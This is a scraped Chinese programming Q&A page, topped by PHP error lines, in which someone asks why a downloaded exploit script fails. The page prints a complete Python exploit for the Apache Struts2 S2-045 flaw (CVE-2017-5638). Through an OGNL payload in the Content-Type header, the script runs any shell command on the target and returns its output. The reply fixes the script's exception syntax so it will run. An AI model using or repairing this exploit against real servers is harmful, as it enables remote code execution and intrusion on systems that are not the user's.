Warning: file_get_contents(/data/phpspider/zhask/data//catemap/8/python-3.x/19.json): failed to open stream: No such file or directory in /data/phpspider/zhask/libs/function.php on line 167

Warning: Invalid argument supplied for foreach() in /data/phpspider/zhask/libs/tag.function.php on line 1116

Notice: Undefined index: in /data/phpspider/zhask/libs/function.php on line 180

Warning: array_chunk() expects parameter 1 to be array, null given in /data/phpspider/zhask/libs/function.php on line 181
Python 我下载了漏洞利用脚本,当尝试运行它时,它会给我一个错误_Python_Python 3.x_Linux_Apache - Fatal编程技术网
Fatal编程技术网
  • python/
  • Python 我下载了漏洞利用脚本,当尝试运行它时,它会给我一个错误

Python 我下载了漏洞利用脚本,当尝试运行它时,它会给我一个错误

python python-3.x linux apache

Python 我下载了漏洞利用脚本,当尝试运行它时,它会给我一个错误,python,python-3.x,linux,apache,Python,Python 3.x,Linux,Apache,我下载了python脚本,以利用apache 2.2.25中的漏洞,并在开始运行时对其进行攻击 它给了我一个错误 这就是代码 #!/usr/bin/python # -*- coding: utf-8 -*- import urllib2 import httplib def exploit(url, cmd): payload = "%{(#_='multipart/form-data')." payload += "(#dm=@ognl.OgnlContext@

我下载了python脚本,以利用apache 2.2.25中的漏洞,并在开始运行时对其进行攻击 它给了我一个错误 这就是代码

    #!/usr/bin/python
# -*- coding: utf-8 -*-

import urllib2
import httplib


def exploit(url, cmd):
    payload = "%{(#_='multipart/form-data')."
    payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
    payload += "(#_memberAccess?"
    payload += "(#_memberAccess=#dm):"
    payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
    payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
    payload += "(#ognlUtil.getExcludedPackageNames().clear())."
    payload += "(#ognlUtil.getExcludedClasses().clear())."
    payload += "(#context.setMemberAccess(#dm))))."
    payload += "(#cmd='%s')." % cmd
    payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
    payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
    payload += "(#p=new java.lang.ProcessBuilder(#cmds))."
    payload += "(#p.redirectErrorStream(true)).(#process=#p.start())."
    payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
    payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
    payload += "(#ros.flush())}"

    try:
        headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': payload}
        request = urllib2.Request(url, headers=headers)
        page = urllib2.urlopen(request).read()
    except httplib.IncompleteRead, e:
        page = e.partial

    print(page)
    return page
    if __name__ == '__main__':
        import sys
        if len(sys.argv) != 3:
            print("[*] struts2_S2-045.py <url> <cmd>")
        else:
            print('[*] CVE: 2017-5638 - Apache Struts2 S2-045')
            url = sys.argv[1]
            cmd = sys.argv[2]
            print("[*] cmd: %s\n" % cmd)
            exploit(url, cmd)
我对python了解不多,所以我请求帮助

您使用的语法是针对Python2.5(以及之前的版本)。对于Python2.6和3.*,请使用

except Exception as e:
错误很明显。你有语法错误。 
except Exception as e: